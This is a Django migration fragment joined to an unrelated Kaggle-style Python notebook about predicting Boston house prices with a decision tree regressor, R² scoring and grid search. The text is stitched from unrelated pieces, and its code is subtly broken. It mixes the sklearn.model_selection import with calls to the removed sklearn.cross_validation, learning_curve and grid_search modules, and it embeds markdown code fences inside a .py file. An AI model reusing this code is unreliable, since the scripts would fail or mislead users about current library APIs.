class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Session',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('club', models.CharField(max_length=20)),
                ('date', models.DateField()),
                ('time', models.CharField(max_length=10)),
                ('event', models.CharField(max_length=40)),
            ],
            options={
                'ordering': ['-date'],
            },
        ),
    ]
# Source file: relancer-exp/original_notebooks/schirmerchad_bostonhoustingmlnd/predicting-boston-house-prices.py (repo: Chenguang-Zhu/relancer, Apache-2.0 license)

#!/usr/bin/env python
# coding: utf-8
# ## Getting Started
# In this project, we will evaluate the performance and predictive power of a model that has been trained and tested on data collected from homes in suburbs of Boston, Massachusetts. A model trained on this data that is seen as a *good fit* could then be used to make certain predictions about a home — in particular, its monetary value. This model would prove to be invaluable for someone like a real estate agent who could make use of such information on a daily basis.
#
# The dataset for this project originates from the [UCI Machine Learning Repository](https://archive.ics.uci.edu/ml/datasets/Housing). The Boston housing data was collected in 1978 and each of the 506 entries represent aggregated data about 14 features for homes from various suburbs in Boston, Massachusetts. For the purposes of this project, the following preprocessing steps have been made to the dataset:
# - 16 data points have an `'MEDV'` value of 50.0. These data points likely contain **missing or censored values** and have been removed.
# - 1 data point has an `'RM'` value of 8.78. This data point can be considered an **outlier** and has been removed.
# - The features `'RM'`, `'LSTAT'`, `'PTRATIO'`, and `'MEDV'` are essential. The remaining **non-relevant features** have been excluded.
# - The feature `'MEDV'` has been **multiplicatively scaled** to account for 35 years of market inflation.
#
# Run the code cell below to load the Boston housing dataset, along with a few of the necessary Python libraries required for this project. You will know the dataset loaded successfully if the size of the dataset is reported.
# In[ ]:
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.model_selection import ShuffleSplit  # sklearn.cross_validation was removed in scikit-learn 0.20
# Pretty display for notebooks
print()
# Input data files are available in the "../../../input/schirmerchad_bostonhoustingmlnd/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
print(check_output(["ls", "../../../input/schirmerchad_bostonhoustingmlnd"]).decode("utf8"))
# In[ ]:
# Load the Boston housing dataset
data = pd.read_csv("../../../input/schirmerchad_bostonhoustingmlnd/housing.csv")
prices = data['MEDV']
features = data.drop('MEDV', axis = 1)
data.head()
# ## Data Exploration
# In this first section of the project, we will make a cursory investigation of the Boston housing data and provide our observations. Familiarizing ourselves with the data through an explorative process is a fundamental practice that helps us better understand and justify our results.
#
# Since the main goal of this project is to construct a working model which has the capability of predicting the value of houses, we will need to separate the dataset into **features** and the **target variable**. The **features**, `'RM'`, `'LSTAT'`, and `'PTRATIO'`, give us quantitative information about each data point. The **target variable**, `'MEDV'`, will be the variable we seek to predict. These are stored in `features` and `prices`, respectively.
# ### Implementation: Calculate Statistics
# For our very first coding implementation, we will calculate descriptive statistics about the Boston housing prices. Since `numpy` has already been imported for us, use this library to perform the necessary calculations. These statistics will be extremely important later on to analyze various prediction results from the constructed model.
#
# In the code cell below, we will need to implement the following:
# - Calculate the minimum, maximum, mean, median, and standard deviation of `'MEDV'`, which is stored in `prices`.
# - Store each calculation in their respective variable.
# In[ ]:
# TODO: Minimum price of the data
minimum_price = np.min(prices)
# TODO: Maximum price of the data
maximum_price = np.max(prices)
# TODO: Mean price of the data
mean_price = np.mean(prices)
# TODO: Median price of the data
median_price = np.median(prices)
# TODO: Standard deviation of prices of the data
std_price = np.std(prices)
# Show the calculated statistics
print("Statistics for Boston housing dataset:\n")
print("Minimum price: ${:,.2f}".format(minimum_price))
print("Maximum price: ${:,.2f}".format(maximum_price))
print("Mean price: ${:,.2f}".format(mean_price))
print("Median price ${:,.2f}".format(median_price))
print("Standard deviation of prices: ${:,.2f}".format(std_price))
# ### Question 1 - Feature Observation
# As a reminder, we are using three features from the Boston housing dataset: `'RM'`, `'LSTAT'`, and `'PTRATIO'`. For each data point (neighborhood):
# - `'RM'` is the average number of rooms among homes in the neighborhood.
# - `'LSTAT'` is the percentage of homeowners in the neighborhood considered "lower class" (working poor).
# - `'PTRATIO'` is the ratio of students to teachers in primary and secondary schools in the neighborhood.
#
#
# ** Using your intuition, for each of the three features above, do you think that an increase in the value of that feature would lead to an **increase** in the value of `'MEDV'` or a **decrease** in the value of `'MEDV'`? Justify your answer for each.**
#
# **Hint:** This problem can phrased using examples like below.
# * Would you expect a home that has an `'RM'` value(number of rooms) of 6 be worth more or less than a home that has an `'RM'` value of 7?
# * Would you expect a neighborhood that has an `'LSTAT'` value(percent of lower class workers) of 15 have home prices be worth more or less than a neighborhood that has an `'LSTAT'` value of 20?
# * Would you expect a neighborhood that has an `'PTRATIO'` value(ratio of students to teachers) of 10 have home prices be worth more or less than a neighborhood that has an `'PTRATIO'` value of 15?
# **Answer: ** In my opinion, the value of 'MEDV' will be dependent on these 3 features in the following way:
#
# 1) **RM** - The higher the value of RM, the higher the value of 'MEDV'. It's fairly evident that as the number of rooms increases, the price of the house increases.
#
# 2) **LSTAT** - The higher the value of LSTAT, the lower the value of 'MEDV'. As the percentage of "lower class" homeowners in the neighbourhood increases, the crime rate in the neighbourhood may also increase; even though LSTAT doesn't have a causal effect on the crime rate, the two are likely to be positively correlated. Another factor is that where the percentage of "lower class" homeowners is high, developers of expensive real estate are less likely to build housing complexes, since most people there will not be able to afford them. So on average, the houses in that region will be cheaper.
#
# 3) **PTRATIO** - The lower the value of PTRATIO, the higher the value of 'MEDV'. If the student-to-teacher ratio is low, individual students get much more attention from the teachers than in a region where this ratio is high. There, because students far outnumber teachers, teachers cannot attend to every student individually, which may affect the quality of the students' education. So regions with a low PTRATIO will have higher house prices.
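# These intuitions can be checked numerically with Pearson correlations against
# 'MEDV'. A minimal sketch using a tiny made-up table (illustrative values only,
# not the Boston data) shows the expected signs:

```python
import pandas as pd

# Illustrative values only: rooms rise, lower-class share falls, and the
# pupil-teacher ratio falls as prices rise, mirroring the intuition above.
toy = pd.DataFrame({
    'RM':      [5.0, 6.0, 7.0, 8.0],
    'LSTAT':   [20.0, 15.0, 10.0, 5.0],
    'PTRATIO': [21.0, 19.0, 17.0, 15.0],
    'MEDV':    [250000.0, 400000.0, 520000.0, 610000.0],
})

corr = toy.corr()['MEDV']
print(corr)  # RM positive; LSTAT and PTRATIO negative
```

# On the actual dataset, the same one-liner, `data.corr()['MEDV']`, shows the same
# pattern of signs.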
# ## Initial Visualization
# In[ ]:
# Using pyplot
import matplotlib.pyplot as plt
plt.figure(figsize=(20, 5))
# i: index
for i, col in enumerate(features.columns):
    # 3 plots here hence 1, 3
    plt.subplot(1, 3, i + 1)
    x = data[col]
    y = prices
    plt.plot(x, y, 'o')
    # Create regression line
    plt.plot(np.unique(x), np.poly1d(np.polyfit(x, y, 1))(np.unique(x)))
    plt.title(col)
    plt.xlabel(col)
    plt.ylabel('prices')
# ----
#
# ## Developing a Model
# In this second section of the project, we will develop the tools and techniques necessary for a model to make a prediction. Being able to make accurate evaluations of each model's performance through the use of these tools and techniques helps to greatly reinforce the confidence in our predictions.
# ### Implementation: Define a Performance Metric
# It is difficult to measure the quality of a given model without quantifying its performance over training and testing. This is typically done using some type of performance metric, whether it is through calculating some type of error, the goodness of fit, or some other useful measurement. For this project, we will be calculating the [*coefficient of determination*](http://stattrek.com/statistics/dictionary.aspx?definition=coefficient_of_determination), R<sup>2</sup>, to quantify our model's performance. The coefficient of determination for a model is a useful statistic in regression analysis, as it often describes how "good" that model is at making predictions.
#
# The values for R<sup>2</sup> range from 0 to 1, which captures the percentage of squared correlation between the predicted and actual values of the **target variable**. A model with an R<sup>2</sup> of 0 is no better than a model that always predicts the *mean* of the target variable, whereas a model with an R<sup>2</sup> of 1 perfectly predicts the target variable. Any value between 0 and 1 indicates what percentage of the target variable, using this model, can be explained by the **features**. _A model can be given a negative R<sup>2</sup> as well, which indicates that the model is **arbitrarily worse** than one that always predicts the mean of the target variable._
#
# For the `performance_metric` function in the code cell below, we will need to implement the following:
# - Use `r2_score` from `sklearn.metrics` to perform a performance calculation between `y_true` and `y_predict`.
# - Assign the performance score to the `score` variable.
# In[ ]:
# TODO: Import 'r2_score'
from sklearn.metrics import r2_score
def performance_metric(y_true, y_predict):
    """ Calculates and returns the performance score between true and predicted values based on the metric chosen. """
    # TODO: Calculate the performance score between 'y_true' and 'y_predict'
    score = r2_score(y_true, y_predict)
    # Return the score
    return score
# ### Question 2 - Goodness of Fit
# Assume that a dataset contains five data points and a model made the following predictions for the target variable:
#
# | True Value | Prediction |
# | :----------: | :--------: |
# | 3.0 | 2.5 |
# | -0.5 | 0.0 |
# | 2.0 | 2.1 |
# | 7.0 | 7.8 |
# | 4.2 | 5.3 |
#
# Run the code cell below to use the `performance_metric` function and calculate this model's coefficient of determination.
# In[ ]:
# Calculate the performance of this model
score = performance_metric([3, -0.5, 2, 7, 4.2], [2.5, 0.0, 2.1, 7.8, 5.3])
print("Model has a coefficient of determination, R^2, of {:.3f}.".format(score))
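# As a sanity check, the same number can be computed by hand from the definition R<sup>2</sup> = 1 - SS<sub>res</sub>/SS<sub>tot</sub>, without scikit-learn. A minimal pure-Python sketch (the `r_squared` helper is our own illustration, not part of the project code):

```python
def r_squared(y_true, y_pred):
    """Coefficient of determination: 1 - SS_res / SS_tot."""
    mean_true = sum(y_true) / len(y_true)
    ss_res = sum((t - p) ** 2 for t, p in zip(y_true, y_pred))  # residual sum of squares
    ss_tot = sum((t - mean_true) ** 2 for t in y_true)          # total sum of squares
    return 1 - ss_res / ss_tot

# The five data points from Question 2
print(round(r_squared([3, -0.5, 2, 7, 4.2], [2.5, 0.0, 2.1, 7.8, 5.3]), 3))  # 0.923
```

# This agrees with the value printed by `performance_metric` above.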
# ### Visualization
# In[ ]:
import numpy as np
import matplotlib.pyplot as plt
true, pred = [3, -0.5, 2, 7, 4.2], [2.5, 0.0, 2.1, 7.8, 5.3]
#Plot true values
true_handle = plt.scatter(true, true, alpha=0.6, color='blue', label='true')
#Reference line
fit = np.poly1d(np.polyfit(true,true,1))
lims = np.linspace(min(true) - 1, max(true) + 1)
plt.plot(lims, fit(lims), alpha=0.3, color='black')
#Plot predicted values
pred_handle = plt.scatter(true, pred, alpha=0.6, color='red', label='predicted')
#Legend and show
plt.legend(handles=[true_handle,pred_handle], loc='upper left')
plt.show()
# * Would you consider this model to have successfully captured the variation of the target variable?
# * Why or why not?
#
# **Hint:** The R2 score is the proportion of the variance in the dependent variable that is predictable from the independent variable. In other words:
# * An R2 score of 0 means that the dependent variable cannot be predicted from the independent variable.
# * An R2 score of 1 means the dependent variable can be predicted from the independent variable.
# * An R2 score between 0 and 1 indicates the extent to which the dependent variable is predictable. An R2 score of 0.40 means that 40 percent of the variance in Y is predictable from X.
# **Answer:** Yes, this model has successfully captured the variation of the target variable, because we get a very high R2 value of 0.923. That means 92.3% of the variance in the true values is explained by the predictions. As this is a very high percentage, we can consider this a successful model.
#
# The only drawback is that there are only 5 data points here, so the result might not be statistically significant. Another caveat is that whether the model is successful also depends largely on the application: for some projects 0.923 is sufficient, whereas for others it could be a low score.
# ### Implementation: Shuffle and Split Data
# Our next implementation requires that we take the Boston housing dataset and split the data into training and testing subsets. Typically, the data is also shuffled into a random order when creating the training and testing subsets to remove any bias in the ordering of the dataset.
#
# For the code cell below, we will need to implement the following:
# - Use `train_test_split` from `sklearn.cross_validation` to shuffle and split the `features` and `prices` data into training and testing sets.
# - Split the data into 80% training and 20% testing.
# - Set the `random_state` for `train_test_split` to a value of your choice. This ensures results are consistent.
# - Assign the train and testing splits to `X_train`, `X_test`, `y_train`, and `y_test`.
# In[ ]:
# TODO: Import 'train_test_split'
from sklearn import cross_validation
# TODO: Shuffle and split the data into training and testing subsets
X_train, X_test, y_train, y_test = cross_validation.train_test_split(features, prices, test_size = 0.2, random_state = 42)
# Success
print("Training and testing split was successful.")
# ### Question 3 - Training and Testing
#
# * What is the benefit to splitting a dataset into some ratio of training and testing subsets for a learning algorithm?
#
# **Hint:** Think about how overfitting or underfitting is contingent upon how the data is split.
# **Answer:** A possible alternative to splitting a dataset into training and testing data would be to train and test on the same data, but that creates a problem: there is a very high chance of producing a high-variance model that may eventually reach 100% accuracy on the data it has seen, only because it is overfitting. Such an overly complex model has limited or no ability to generalize, so when we use it on unseen data it will give very low accuracy. To avoid that, we split the data into training and testing sets and train the model only on the training data. The testing accuracy is then a much better estimate of real-world performance than the training accuracy.
#
# But the split can create a problem too. If we have a very limited dataset, then even taking out a small sample as testing data means losing a portion of the training data. There is an inherent trade-off here, which might cause underfitting on small datasets. This is where we can take advantage of K-fold cross-validation: we divide all the data points into k bins and then run k separate learning experiments. In each of those, we pick one of the k bins as our testing set and the remaining k-1 bins as our training set, then average the results. This way we make the most of a limited dataset.
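# The k-fold partitioning just described can be sketched in a few lines of plain Python. This is a simplified illustration of the bin/rotation idea (no shuffling), not scikit-learn's implementation:

```python
def k_fold_indices(n_samples, k):
    """Yield (train_indices, test_indices) for each of the k folds."""
    indices = list(range(n_samples))
    fold_size = n_samples // k
    for fold in range(k):
        # One bin serves as the test set...
        test = indices[fold * fold_size:(fold + 1) * fold_size]
        # ...and the remaining k-1 bins form the training set
        train = indices[:fold * fold_size] + indices[(fold + 1) * fold_size:]
        yield train, test

# With 10 points and k=5, every point lands in exactly one test fold
for train, test in k_fold_indices(10, 5):
    print(test)
```

# In practice the indices would be shuffled first; the point is that each of the k experiments holds out a different bin.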
# ----
#
# ## Analyzing Model Performance
# In this third section of the project, we'll take a look at several models' learning and testing performances on various subsets of training data. Additionally, we'll investigate one particular algorithm with an increasing `'max_depth'` parameter on the full training set to observe how model complexity affects performance. Graphing our model's performance based on varying criteria can be beneficial in the analysis process, such as visualizing behavior that may not have been apparent from the results alone.
# ### Learning Curves
# The following code cell produces four graphs for a decision tree model with different maximum depths. Each graph visualizes the learning curves of the model for both training and testing as the size of the training set is increased. Note that the shaded region of a learning curve denotes the uncertainty of that curve (measured as the standard deviation). The model is scored on both the training and testing sets using R<sup>2</sup>, the coefficient of determination.
#
# Run the code cell below and use these graphs to answer the following question.
# In[ ]:
#Define the necessary functions for plotting
###########################################
# Suppress matplotlib user warnings
# Necessary for newer version of matplotlib
import warnings
warnings.filterwarnings("ignore", category = UserWarning, module = "matplotlib")
#
# Display inline matplotlib plots with IPython
from IPython import get_ipython
if get_ipython() is not None:
    get_ipython().run_line_magic('matplotlib', 'inline')
###########################################
import matplotlib.pyplot as pl
import numpy as np
import sklearn.learning_curve as curves
from sklearn.tree import DecisionTreeRegressor
from sklearn.cross_validation import ShuffleSplit, train_test_split
def ModelLearning(X, y):
    """ Calculates the performance of several models with varying sizes of training data. The learning and testing scores for each model are then plotted. """
    # Create 10 cross-validation sets for training and testing
    cv = ShuffleSplit(X.shape[0], n_iter = 10, test_size = 0.2, random_state = 0)
    # Generate the training set sizes increasing by roughly 50
    train_sizes = np.rint(np.linspace(1, X.shape[0]*0.8 - 1, 9)).astype(int)
    # Create the figure window
    fig = pl.figure(figsize=(10,7))
    # Create four different models based on max_depth
    for k, depth in enumerate([1,3,6,10]):
        # Create a Decision tree regressor at max_depth = depth
        regressor = DecisionTreeRegressor(max_depth = depth)
        # Calculate the training and testing scores
        sizes, train_scores, test_scores = curves.learning_curve(regressor, X, y, cv = cv, train_sizes = train_sizes, scoring = 'r2')
        # Find the mean and standard deviation for smoothing
        train_std = np.std(train_scores, axis = 1)
        train_mean = np.mean(train_scores, axis = 1)
        test_std = np.std(test_scores, axis = 1)
        test_mean = np.mean(test_scores, axis = 1)
        # Subplot the learning curve
        ax = fig.add_subplot(2, 2, k+1)
        ax.plot(sizes, train_mean, 'o-', color = 'r', label = 'Training Score')
        ax.plot(sizes, test_mean, 'o-', color = 'g', label = 'Testing Score')
        ax.fill_between(sizes, train_mean - train_std, train_mean + train_std, alpha = 0.15, color = 'r')
        ax.fill_between(sizes, test_mean - test_std, test_mean + test_std, alpha = 0.15, color = 'g')
        # Labels
        ax.set_title('max_depth = %s'%(depth))
        ax.set_xlabel('Number of Training Points')
        ax.set_ylabel('Score')
        ax.set_xlim([0, X.shape[0]*0.8])
        ax.set_ylim([-0.05, 1.05])
    # Visual aesthetics
    ax.legend(bbox_to_anchor=(1.05, 2.05), loc='lower left', borderaxespad = 0.)
    fig.suptitle('Decision Tree Regressor Learning Performances', fontsize = 16, y = 1.03)
    fig.tight_layout()
    #fig.show()
def ModelComplexity(X, y):
    """ Calculates the performance of the model as model complexity increases. The learning and testing error rates are then plotted. """
    # Create 10 cross-validation sets for training and testing
    cv = ShuffleSplit(X.shape[0], n_iter = 10, test_size = 0.2, random_state = 0)
    # Vary the max_depth parameter from 1 to 10
    max_depth = np.arange(1,11)
    # Calculate the training and testing scores
    train_scores, test_scores = curves.validation_curve(DecisionTreeRegressor(), X, y, param_name = "max_depth", param_range = max_depth, cv = cv, scoring = 'r2')
    # Find the mean and standard deviation for smoothing
    train_mean = np.mean(train_scores, axis=1)
    train_std = np.std(train_scores, axis=1)
    test_mean = np.mean(test_scores, axis=1)
    test_std = np.std(test_scores, axis=1)
    # Plot the validation curve
    pl.figure(figsize=(7, 5))
    pl.title('Decision Tree Regressor Complexity Performance')
    pl.plot(max_depth, train_mean, 'o-', color = 'r', label = 'Training Score')
    pl.plot(max_depth, test_mean, 'o-', color = 'g', label = 'Validation Score')
    pl.fill_between(max_depth, train_mean - train_std, train_mean + train_std, alpha = 0.15, color = 'r')
    pl.fill_between(max_depth, test_mean - test_std, test_mean + test_std, alpha = 0.15, color = 'g')
    # Visual aesthetics
    pl.legend(loc = 'lower right')
    pl.xlabel('Maximum Depth')
    pl.ylabel('Score')
    pl.ylim([-0.05,1.05])
    #pl.show()
def PredictTrials(X, y, fitter, data):
    """ Performs trials of fitting and predicting data. """
    # Store the predicted prices
    prices = []
    for k in range(10):
        # Split the data
        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = k)
        # Fit the data
        reg = fitter(X_train, y_train)
        # Make a prediction
        pred = reg.predict([data[0]])[0]
        prices.append(pred)
        # Result
        print("Trial {}: ${:,.2f}".format(k+1, pred))
    # Display price range
    print("\nRange in prices: ${:,.2f}".format(max(prices) - min(prices)))
# In[ ]:
# Produce learning curves for varying training set sizes and maximum depths
ModelLearning(features, prices)
# ### Question 4 - Learning the Data
# * Choose one of the graphs above and state the maximum depth for the model.
# * What happens to the score of the training curve as more training points are added? What about the testing curve?
# * Would having more training points benefit the model?
#
# **Hint:** Are the learning curves converging to particular scores? Generally speaking, the more data you have, the better. But if your training and testing curves are converging with a score above your benchmark threshold, would this be necessary?
# Think about the pros and cons of adding more training points based on if the training and testing curves are converging.
# **Answer:**
#
# A) max_depth = 1 (High Bias scenario): Initially the Testing Score (green line) increases with the number of training points, but then it plateaus at a very low score of about 0.4 (40%), and adding more training points has no effect. This shows that the model does not generalize well to unseen data. The Training Score (red line) decreases with the number of training points and saturates at roughly the same score of 0.4. This shows that the model is underfitting the data and is not complex enough. In this scenario, adding more training points will not benefit the model; instead, its complexity should be increased to better fit the dataset.
#
# B) max_depth = 3 (Best scenario): The Testing Score (green line) increases with the number of training points, reaching a fairly high score of 0.8, so the model generalizes well. The Training Score (red line) decreases slightly, reaches about 0.8, and stays constant, so the model fits well while still achieving a high score. The testing score shows two significant phases with different rates of change: a positive rate of change up to approximately 200 training points (within which the increase is very steep up to about 50 points and much slower between 50 and 200), and a plateau with little or no change beyond 200 training points. So below 200 training points, adding more data will definitely improve the score, but beyond that, adding more training points will not be very useful as the curve plateaus.
#
# C) max_depth = 6 (High Variance scenario): The Testing Score (green line) increases with the number of training points and reaches 0.7. Even though this is not a bad score, the model does not generalize as well as it does at max_depth = 3. The Training Score (red line) decreases ever so slightly and stays at 0.9, which is a strong sign that it is overfitting the data: a high variance problem. Here too, the testing score shows similar behaviour to the previous case (it plateaus after 200 training points). So once again, adding more training points improves the testing score while the number of training points is below 200, but beyond that, adding more points will not benefit us much.
#
# D) max_depth = 10 (Higher Variance scenario): The Testing Score (green line) increases with the number of training points and reaches 0.7, so it has the same problem as the previous case: it does not generalize the data as well as scenario B). The Training Score (red line) remains constant throughout at a perfect score of 1 (100% accuracy), which tells us the model is definitely overfitting the data. This is also a very high variance problem. Once again the curves show exactly the same behaviour, where adding training points up to 200 increases the score but not beyond that.
#
#
# ### Complexity Curves
# The following code cell produces a graph for a decision tree model that has been trained and validated on the training data using different maximum depths. The graph produces two complexity curves — one for training and one for validation. Similar to the **learning curves**, the shaded regions of both the complexity curves denote the uncertainty in those curves, and the model is scored on both the training and validation sets using the `performance_metric` function.
#
# **Run the code cell below and use this graph to answer the following two questions (Q5 and Q6).**
# In[ ]:
ModelComplexity(X_train, y_train)
# ### Question 5 - Bias-Variance Tradeoff
# * When the model is trained with a maximum depth of 1, does the model suffer from high bias or from high variance?
# * How about when the model is trained with a maximum depth of 10? What visual cues in the graph justify your conclusions?
#
# **Hint:** High bias is a sign of underfitting(model is not complex enough to pick up the nuances in the data) and high variance is a sign of overfitting(model is by-hearting the data and cannot generalize well). Think about which model(depth 1 or 10) aligns with which part of the tradeoff.
# **Answer:** We can easily recognize a High Bias or High Variance problem by simply looking at the graph of training and testing scores.
#
# If there is High Bias, there will be very little gap between Training and Testing Scores. This is because in High Bias scenarios, the model underfits the data and also cannot generalize the data well resulting in both curves converging to a low score.
#
# If there is High Variance, there will be a large gap between the Training and Testing Scores. This is because in a High Variance model, even though the model fits the training data well, it does not generalize well as a result of overfitting. This leads to a high Training Score but a relatively low Testing/Validation Score.
#
# A) Maximum Depth = 1 (High Bias): Here both Training and Testing Scores are low, so the model is neither fitting nor generalizing well. Thus the two curves are very close to each other, and hence this is a High Bias situation.
#
# B) Maximum Depth = 10 (High Variance): Here there is a huge gap between the Training and Testing Scores. The Training Score is almost perfect at 1, but the testing score is much lower at around 0.7. So the model is overfitting and hence does not generalize well, resulting in a lower Validation Score. This is a High Variance situation, with the curves far apart.
# ### Question 6 - Best-Guess Optimal Model
# * Which maximum depth do you think results in a model that best generalizes to unseen data?
# * What intuition led you to this answer?
#
# **Hint:** Look at the graph above Question 5 and see where the validation scores lie for the various depths that have been assigned to the model. Does it get better with increased depth? At what point do we get our best validation score without overcomplicating our model? And remember, Occam's Razor states "Among competing hypotheses, the one with the fewest assumptions should be selected."
# **Answer:** Maximum Depth = 4
#
# The validation score seems to plateau here, so this is the highest validation score we can get, i.e. the best generalization to unseen data.
#
# The gap between the Training Score and the Validation Score is not significantly large here either, which indicates that the model is not suffering from High Variance.
# -----
#
# ## Evaluating Model Performance
# In this final section of the project, we will construct a model and make a prediction on the client's feature set using an optimized model from `fit_model`.
# ### Question 7 - Grid Search
# * What is the grid search technique?
# * How can it be applied to optimize a learning algorithm?
#
# **Answer:** The grid search technique allows us to define a grid of hyperparameter values for a specific estimator; grid search then exhaustively tries every possible combination of those values in order to find the best model. Combined with a cross-validation technique like K-fold or Stratified Shuffle Split, grid search selects the hyperparameter values that yield the highest validation score, thereby optimizing the learning algorithm.
#
# **Point to note:** Due to its exhaustive search nature, grid search can be computationally expensive, especially when the dataset is large and the model is complicated. In such cases we sometimes resort to randomized search, which evaluates only a sample of the possible parameter combinations.
# (http://scikit-learn.org/stable/modules/generated/sklearn.grid_search.RandomizedSearchCV.html#sklearn-grid-search-randomizedsearchcv)
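# The difference between exhaustive and randomized search can be illustrated with a toy sketch in plain Python. This only illustrates the sampling idea (the parameter names below are hypothetical), not the scikit-learn API:

```python
import itertools
import random

# A hypothetical parameter grid: 10 x 3 = 30 combinations
param_grid = {'max_depth': range(1, 11), 'min_samples_split': [2, 5, 10]}

# Grid search evaluates every combination...
grid_candidates = list(itertools.product(*param_grid.values()))

# ...while randomized search evaluates only a fixed-size sample of them
random.seed(0)
random_candidates = random.sample(grid_candidates, 8)

print(len(grid_candidates), len(random_candidates))  # 30 8
```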
# ### Question 8 - Cross-Validation
#
# * What is the k-fold cross-validation training technique?
#
# * What benefit does this technique provide for grid search when optimizing a model?
#
# **Hint:** When explaining the k-fold cross validation technique, be sure to touch upon what 'k' is, how the dataset is split into different parts for training and testing and the number of times it is run based on the 'k' value.
#
# When thinking about how k-fold cross validation helps grid search, think about the main drawbacks of grid search which are hinged upon **using a particular subset of data for training or testing** and how k-fold cv could help alleviate that. You can refer to the [docs](http://scikit-learn.org/stable/modules/cross_validation.html#cross-validation) for your answer.
# **Answer:** In the K-fold cross-validation technique, we partition the data into k bins of equal size and then run k separate learning experiments. In each experiment, we pick one of the k bins as the testing set and put the remaining k-1 bins together into the training set, then train the learning algorithm and, just like before, evaluate its performance on the testing set. The key point of cross-validation is that we run this k times, once per hold-out set, and average the k testing-set performances. This obviously takes more computation time, since we now run k separate learning experiments, but the assessment of the learning algorithm is more accurate.
#
# If we run grid search without cross-validation, we can end up with different sets of "optimal" hyperparameters from different splits, because the estimate of out-of-sample performance from a single split has a high variance.
#
# So in summary, without k-fold cross-validation, grid search will select hyperparameter values that work really well on one particular train/test split, but there is a high risk that they will work poorly on unknown datasets because of that high variance.
#
#
# ### Implementation: Fitting a Model
# Our final implementation requires that we bring everything together and train a model using the **decision tree algorithm**. To ensure that we are producing an optimized model, we will train the model using the grid search technique to optimize the `'max_depth'` parameter for the decision tree. The `'max_depth'` parameter can be thought of as how many questions the decision tree algorithm is allowed to ask about the data before making a prediction. Decision trees are part of a class of algorithms called *supervised learning algorithms*.
#
# In addition, we will find our implementation is using `ShuffleSplit()` for an alternative form of cross-validation (see the `'cv_sets'` variable). While it is not the K-Fold cross-validation technique you describe in **Question 8**, this type of cross-validation technique is just as useful. The `ShuffleSplit()` implementation below will create 10 (`'n_splits'`) shuffled sets, and for each shuffle, 20% (`'test_size'`) of the data will be used as the *validation set*. While we're working on our implementation, we'll think about the contrasts and similarities it has to the K-fold cross-validation technique.
#
# Please note that ShuffleSplit has different parameters in scikit-learn versions 0.17 and 0.18.
# For the `fit_model` function in the code cell below, we will need to implement the following:
# - Use [`DecisionTreeRegressor`](http://scikit-learn.org/stable/modules/generated/sklearn.tree.DecisionTreeRegressor.html) from `sklearn.tree` to create a decision tree regressor object.
# - Assign this object to the `'regressor'` variable.
# - Create a dictionary for `'max_depth'` with the values from 1 to 10, and assign this to the `'params'` variable.
# - Use [`make_scorer`](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.make_scorer.html) from `sklearn.metrics` to create a scoring function object.
# - Pass the `performance_metric` function as a parameter to the object.
# - Assign this scoring function to the `'scoring_fnc'` variable.
# - Use [`GridSearchCV`](http://scikit-learn.org/0.17/modules/generated/sklearn.grid_search.GridSearchCV.html) from `sklearn.grid_search` to create a grid search object.
# - Pass the variables `'regressor'`, `'params'`, `'scoring_fnc'`, and `'cv_sets'` as parameters to the object.
# - Assign the `GridSearchCV` object to the `'grid'` variable.
# In[ ]:
# TODO: Import 'make_scorer', 'DecisionTreeRegressor', and 'GridSearchCV'
from sklearn.tree import DecisionTreeRegressor
from sklearn.metrics import make_scorer
from sklearn.grid_search import GridSearchCV
def fit_model(X, y):
    """ Performs grid search over the 'max_depth' parameter for a decision tree regressor trained on the input data [X, y]. """
    # Create cross-validation sets from the training data
    # sklearn version 0.18: ShuffleSplit(n_splits=10, test_size=0.1, train_size=None, random_state=None)
    # sklearn version 0.17: ShuffleSplit(n, n_iter=10, test_size=0.1, train_size=None, random_state=None)
    cv_sets = ShuffleSplit(X.shape[0], n_iter = 10, test_size = 0.20, random_state = 0)
    # TODO: Create a decision tree regressor object
    regressor = DecisionTreeRegressor(random_state = 1001)
    # TODO: Create a dictionary for the parameter 'max_depth' with a range from 1 to 10
    params = {'max_depth': list(range(1, 11))}
    # TODO: Transform 'performance_metric' into a scoring function using 'make_scorer'
    scoring_fnc = make_scorer(performance_metric)
    # TODO: Create the grid search cv object --> GridSearchCV()
    # Make sure to include the right parameters in the object:
    # (estimator, param_grid, scoring, cv) which have values 'regressor', 'params', 'scoring_fnc', and 'cv_sets' respectively.
    grid = GridSearchCV(regressor, params, scoring = scoring_fnc, cv = cv_sets)
    # Fit the grid search object to the data to compute the optimal model
    grid = grid.fit(X, y)
    # Return the optimal model after fitting the data
    return grid.best_estimator_
# ### Making Predictions
# Once a model has been trained on a given set of data, it can now be used to make predictions on new sets of input data. In the case of a *decision tree regressor*, the model has learned *what the best questions to ask about the input data are*, and can respond with a prediction for the **target variable**. We can use these predictions to gain information about data where the value of the target variable is unknown — such as data the model was not trained on.
# ### Question 9 - Optimal Model
#
# * What maximum depth does the optimal model have? How does this result compare to your guess in **Question 6**?
#
# Run the code block below to fit the decision tree regressor to the training data and produce an optimal model.
# In[ ]:
# Fit the training data to the model using grid search
reg = fit_model(X_train, y_train)
# Produce the value for 'max_depth'
print("Parameter 'max_depth' is {} for the optimal model.".format(reg.get_params()['max_depth']))
# **Hint:** The answer comes from the output of the code snippet above.
#
# **Answer:** The optimal model has a maximum depth of 4. This exactly matches our guess from **Question 6**. Both results are reliable, as in both cases we used cross-validation with ShuffleSplit combined with a search over a range of max_depth hyperparameter values to find the most optimal one. So based on our course of action, there is very little chance that our model will perform poorly on unknown datasets because of high variance.
# ### Question 10 - Predicting Selling Prices
# Imagine that we were a real estate agent in the Boston area looking to use this model to help price homes owned by our clients that they wish to sell. We have collected the following information from three of our clients:
#
# | Feature | Client 1 | Client 2 | Client 3 |
# | :---: | :---: | :---: | :---: |
# | Total number of rooms in home | 5 rooms | 4 rooms | 8 rooms |
# | Neighborhood poverty level (as %) | 17% | 32% | 3% |
# | Student-teacher ratio of nearby schools | 15-to-1 | 22-to-1 | 12-to-1 |
#
# * What price would you recommend each client sell his/her home at?
